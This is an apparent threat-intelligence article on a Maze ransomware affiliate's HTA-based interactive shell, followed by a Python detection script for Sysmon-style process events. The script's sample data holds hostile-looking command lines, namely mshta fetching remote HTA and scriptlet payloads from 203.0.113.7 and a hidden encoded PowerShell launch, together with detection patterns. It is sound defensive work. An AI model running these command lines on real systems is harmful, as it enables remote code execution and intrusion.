Maze is currently one of the most widely used ransomware families in the wild, and it is distributed by capable threat actors.
We found a Maze affiliate that implemented a custom persistence mechanism before deploying the ransomware.
The actor may also have used a forged certificate to sign the payload.
As in other attacks, the attacker uses an obfuscated HTA payload as an interactive shell that collects information from the host in real time.
Over the past year or so, Maze has been used extensively and has been the primary weapon of many different threat actors around the world. Last year the Maze operators began not only extorting companies by encrypting their files, but also threatening to publish the stolen files if the ransom was not paid. Recently we found a Maze affiliate attempting to spread across one of our customers' networks.
In this article we share detailed information on this Maze affiliate's activity to clarify their strategy and to help security teams find similar IOCs in their own networks.
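The HTA-as-interactive-shell behaviour mentioned above, and the IOC hunting this article aims to support, as an added detection example that is not part of the original page and not the Maze operators' code. It parses constructed Sysmon-style process-creation events and flags three things a practitioner would hunt for: mshta.exe launched with a remote or inline payload, an HTA file run from a user-writable path, and a command interpreter spawned by mshta.exe. The event format, field names, file paths, process IDs and the 203.0.113.7 address are all assumptions for illustration.

```python
import json
import os
import re

# Constructed Sysmon-style process-creation events (JSON lines), written for
# this example. They are not telemetry from the incident described above.
SAMPLE_EVENTS = r"""
{"pid": 3008, "ppid": 900,  "image": "C:\\Windows\\explorer.exe", "cmdline": "C:\\Windows\\explorer.exe"}
{"pid": 4120, "ppid": 3008, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://203.0.113.7/update.hta"}
{"pid": 4188, "ppid": 4120, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami /all & ipconfig /all"}
{"pid": 4201, "ppid": 4120, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"pid": 5002, "ppid": 3008, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Program Files\\Vendor\\help.hta"}
{"pid": 5100, "ppid": 3008, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe javascript:a=GetObject('script:https://203.0.113.7/s.sct').Exec();close()"}
{"pid": 5200, "ppid": 3008, "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"}
{"pid": 5300, "ppid": 3008, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.hta"}
"""

MSHTA = "mshta.exe"

# Interpreters an HTA-based shell typically spawns to run collection commands.
INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe",
}

# Directories a normal user can write to; an HTA run from here is unusual.
USER_WRITABLE = re.compile(
    r"\\(Users|Temp|AppData|ProgramData|Downloads|Public)\\", re.IGNORECASE)

# URL, UNC path, or a javascript:/vbscript: protocol handler on the mshta
# command line: the payload is remote or inline rather than a local .hta file.
REMOTE_OR_INLINE = re.compile(
    r"(https?://|\\\\[^\\]+\\|javascript:|vbscript:)", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines process-creation events into dicts, skipping blanks."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name of a Windows path, portable across host OSes."""
    return os.path.basename(path.replace("\\", "/")).lower()


def detect(events):
    """Return (pid, rule_name) findings for mshta-related suspicious activity."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        cmd = e["cmdline"]
        if name == MSHTA:
            if REMOTE_OR_INLINE.search(cmd):
                findings.append((e["pid"], "mshta_remote_or_inline_payload"))
            elif USER_WRITABLE.search(cmd):
                findings.append((e["pid"], "mshta_hta_from_user_writable_path"))
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == MSHTA and name in INTERPRETERS:
            findings.append((e["pid"], "interpreter_spawned_by_mshta"))
    return findings


def shell_sessions(events, findings):
    """Group interpreter children under their mshta parent to expose the shell."""
    by_pid = {e["pid"]: e for e in events}
    sessions = {}
    for pid, rule in findings:
        if rule == "interpreter_spawned_by_mshta":
            parent = by_pid[pid]["ppid"]
            sessions.setdefault(parent, []).append(by_pid[pid]["cmdline"])
    return sessions


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    hits = detect(evts)
    for pid, rule in hits:
        print(f"pid {pid}: {rule}")
    for parent, children in shell_sessions(evts, hits).items():
        print(f"mshta pid {parent} acted as a shell, ran: {children}")
```

The legitimate vendor HTA (pid 5002) produces no finding, while the remote-URL launch, the javascript: protocol-handler launch, the HTA run from a Temp directory, and the cmd.exe and powershell.exe children of mshta.exe are all flagged; the parent-child grouping is what turns individual hits into evidence of an interactive shell.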